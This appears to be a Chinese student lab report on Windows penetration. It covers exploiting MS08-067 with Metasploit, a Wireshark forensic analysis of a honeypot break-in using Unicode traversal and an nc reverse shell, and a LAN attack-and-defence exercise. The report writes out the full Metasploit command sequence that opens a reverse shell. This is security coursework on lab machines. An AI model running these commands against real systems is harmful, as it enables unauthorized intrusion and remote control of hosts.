实验要求
(1)动手实践Metasploit windows attacker
任务:使用metasploit软件进行windows远程渗透统计实验
具体任务内容:使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权
(2)取证分析实践:解码一次成功的NT系统破解攻击。
来自192.168.200.4的攻击者成功攻陷了一台由rfp部署的蜜罐主机192.168.200.5,(主机名为Win2kServer_SP0_target),要求提取并分析攻击的全部过程。
- 攻击者使用了什么破解工具进行攻击
- 攻击者如何使用这个破解工具进入并控制了系统
- 攻击者获得系统访问权限后做了什么 我们如何防止这样的攻击
- 你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么
(3)团队对抗实践:windows系统远程渗透攻击和分析。
攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)
防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。
实验过程
动手实践Metasploit windows attacker
启动msf
msfconsole
使用ms08_067漏洞攻击模块
use exploit/windows/smb/ms08_067_netapi
设置打开反向连接的载荷
set PAYLOAD generic/shell_reverse_tcp
看一下需要设置哪些参数
show options
设置攻击的RHOST以及反向连接的监听ip LHOST。
set RHOST 192.168.200.5
set LHOST 192.168.200.4
设置TARGET为0会自动识别靶机系统,输入exploit进行攻击
set TARGET 0
exploit
攻击成功
取证分析实践:解码一次成功的NT系统破解攻击
下载文件后用wireshark打开,通过观察数据包的流向可以知道213.116.251.162为攻击者,172.16.1.106为靶机,我们以这两个ip为条件筛选一下。
ip.addr==213.116.251.162 && ip.addr==172.16.1.106
这里面http的流量很多,先追踪http流看看
在111流中,可以看到攻击者已经可以远程读取靶机信息了。
这里的流量,这不就是Unicode漏洞攻击么,Unicode漏洞是攻击者可通过IE浏览器远程运行被攻击计算机的cmd.exe文件,从而使该计算机的文件暴露,且可随意执行和更改文件的漏洞。这里是利用sql的方式去触发Unicode漏洞
可以在后面的流中看到攻击者利用漏洞做了什么操作
后面的流换了一种方式,%c0%af = /是任意文件读取漏洞,不过执行的操作好像和前面差不多
看这个流程应该是利用sql注入、文件任意读取漏洞去执行cmd,通过nc反向回连获得shell。
后面就是把各种信息填入对应的txt中
接着就是一些提权操作了,比如说把自己的账户填进用户组中
这里可以看到访问者连接到6868端口并获得了权限
从这已经可以看出攻击者知道是蜜罐主机了
团队对抗实践:windows系统远程渗透攻击和分析
本次攻防实践和20222934xzl同学一起进行,相关主机均设置为桥接模式,并连接在同一个局域网之下,以模拟实际情况,相关IP地址如下:
对方ip为192.168.249.166
我方ip为192.168.249.165
作为攻击方,攻击机IP为192.168.249.165,首先测试与目标主机的连通性,没有问题:
之后按照实验1的步骤,加载漏洞模块、设置负载、源IP、目的IP,然后发起进攻:
攻击成功后,查看了靶机IP地址,然后创建了一个名为naf文件夹以简单“告知”xzl。
遇到的问题
实验一攻击不成功
解决方案:将网段置于一个同一网段即可攻击
实践总结
本次实验动手实践了使用msf渗透主机的过程,了解了这个工具的使用,也仔细分析了一次成功的NT系统破解攻击,帮助自己理解了攻击过程。